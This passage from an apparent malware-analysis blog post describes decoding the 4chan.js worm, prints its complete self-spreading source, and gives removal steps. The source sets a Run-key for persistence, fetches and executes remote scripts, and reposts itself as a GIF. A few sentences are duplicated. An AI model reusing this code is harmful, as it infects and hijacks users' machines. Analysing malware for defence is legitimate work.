t of encoding it was using, and folks pointed me to the post at the SAN Internet Storm Center:
But that had few detail on how the encoding was done. Byte_Bucket from Pauldotcom pointed me at a tool called "Windows Script Encoder" from Microsoft that seems to be what was used. After doing some checking, the encoded part of the JSE starts with #@~^ , which is also what the MS tool creates.
Once I knew Windows Script Encoder was used, I Google around for a decoder. This site:
Once I knew Windows Script Encoder was used, I Google around for a decoder. This site:
pointed me at a JSE decoder you can find here:
http://www.virtualconspiracy.com/content/scrdec/download
and it seems to work. Rather than explain what the script does in great detail you can just read the source here:
and it seems to work. Rather than explain what the script does in great detail you can just read the source here:
GIF89aI = "x1!þ÷"; var xhr = new ActiveXObject("Msxml2.XMLHTTP"); var shell = new ActiveXObject("WScript.Shell"); var fso = new ActiveXObject("Scripting.FileSystemObject"); var ie = new ActiveXObject("InternetExplorer.Application"); "‰"; shell.currentDirectory = fso.getSpecialFolder(2); shell.run("cmd /c copy \"" + WSH.scriptFullName + "\" sys.jse"); try { "û"; shell.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\sysjse", "wscript /b " + fso.getSpecialFolder(2) + "\\sys.jse"); } catch(e) {} while(1) { try { xhr.open("get", "http://img.4chan.org/b/", 0); "ö"; xhr.setRequestHeader("If-Modified-Since", new Date(0)); xhr.send(); var page = xhr.responseText; try { xhr.open("get", page.match(/<a href="(http:\/\/img\.4chan\.org\/b\/src\/\d+\....)/)[1], 0); "è"; xhr.send(); var im = new ActiveXObject("Adodb.Stream"); im.mode = 3; im.type = 1; im.open(); im.write(xhr.responseBody); im.saveToFile("j.jse", 2); "ÿ"; shell.run("wscript /b j.jse"); } catch(e) {} var bdry = (""+Math.random()).substr(2); var head = "\r\n--" + bdry + "\r\nContent-Disposition: form-data; name="; var part1 = fso.openTextFile("y", 2, 1); "Ó"; part1.write(head + "resto\r\n\r\n" + page.match(/<span id="nothread(\d+)/)[1] + head + "upfile; filename=a.gif\r\n\r\n"); part1.close(); var part2 = fso.openTextFile("z", 2, 1); "ú"; part2.write((""+Math.random()).substr(2) + head + "mode\r\n\r\nregist\r\n--" + bdry + "--\r\n"); part2.close(); shell.run("cmd /c copy /b y+sys.jse+z p", 0, 1); var post = new ActiveXObject("Adodb.Stream"); "Ù"; post.mode = 3; post.type = 1; post.open(); post.loadFromFile("p"); try { ie.navigate("http://img.4chan.org/b/"); do { WSH.sleep(100); "Å"; } while (ie.readyState != 4); ie.stop(); ie.document.cookie = "nws_style=; expires=" + new Date(0) + "; path=/; domain=.4chan.org"; } catch(e) {} "ö"; xhr.open("post", "http://dat.4chan.org/b/imgboard.php", 0); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + bdry); xhr.send(post); WSH.sleep(50000); } catch(e) {} } |
It seems the end point was just to spam 4chan and ban the user as a result. Cleanup and removal is about as simple as
1. Kill the wscript process
2. Removing the registry entry at: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\sysjse or just use MSConfig to remove it from start up.
3. Remove sys.jse from your temp directory (Most likely something similar to c:\Documents and Settings\YouUserName\Local Settings\Temp ).
For more info on this Malware, check out:
http://encyclopediadramatica.com/4chan.js#It_returns.2C_again (NSFW in some cases)
Comments
Post a Comment